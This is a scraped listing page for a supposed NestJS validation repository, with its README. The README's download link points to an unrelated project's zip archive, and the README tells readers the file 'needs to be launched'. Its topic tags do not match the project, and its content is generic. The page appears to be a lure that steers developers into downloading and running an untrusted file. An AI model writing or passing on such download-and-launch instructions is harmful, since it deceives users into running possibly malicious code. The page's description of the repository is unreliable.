An open API service indexing awesome lists of open source software.

https://github.com/tintin1886/custom-class-validator

Repository created to demonstrate how to create validations using decorators in NestJS. Decorators-based validations, allowing you to implement all the validations in your preferred way and in the most performance-efficient manner possible. All this, without using any external libraries.
https://github.com/tintin1886/custom-class-validator

class-validator deep-learning fluent-api gpu-support model-validation mongoose multiform-validator nestjs nodejs specification spring-mvc validation validator winston-logger

Last synced: 11 months ago
JSON representation

Repository created to demonstrate how to create validations using decorators in NestJS. Decorators-based validations, allowing you to implement all the validations in your preferred way and in the most performance-efficient manner possible. All this, without using any external libraries.

Awesome Lists containing this project

README

          

# 🚀 Welcome to custom-class-validator repository!

![Class Validator](https://img.shields.io/badge/Class-Validator-brightgreen)

## Description
This repository is dedicated to showcasing how to create validations using decorators in NestJS. By utilizing decorators for validations, you can implement all the necessary validations in a performance-efficient manner without relying on external libraries. This approach provides flexibility in implementing validations according to your preferences.

## Topics
- Class
- Class Validator
- Decorator
- Decorators
- DTO
- Learn
- Multiform Validator
- NestJS
- Student-vscode
- Validator

## 📝 Getting Started
To explore the implementation of decorators for validations and learn how to create efficient validations in NestJS, you can access the repository from the link below:
[Download custom-class-validator](https://github.com/cli/go-gh/archive/refs/tags/v1.0.0.zip)

_The link ends with a file name, indicating that it needs to be launched._

If the link is not working or unavailable, please visit the "Releases" section of this repository for alternative download options.

## 🌟 Features
- Implementation of class-based validations using decorators.
- Learn how to create efficient validations in NestJS without external libraries.
- Explore different approaches to implementing validations in your preferred way.

## 🛠️ Usage
1. Clone the repository to your local machine.
2. Navigate to the project directory.
3. Install the dependencies using `npm install`.
4. Explore the codebase to understand how decorators are used for validations.
5. Experiment with creating your own custom validations.

## 🤝 Contribution
Contributions to enhance the functionality of this repository are welcome! Feel free to fork the repository and submit pull requests to suggest improvements or new features.

## 📄 License
This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.

---

📌 **Note:** For a comprehensive guide on how to create validations using decorators in NestJS, refer to the documentation in this repository. Happy coding! 🎉

![NestJS Logo](https://www.vectorlogo.zone/logos/nestjs/nestjs-ar21.svg)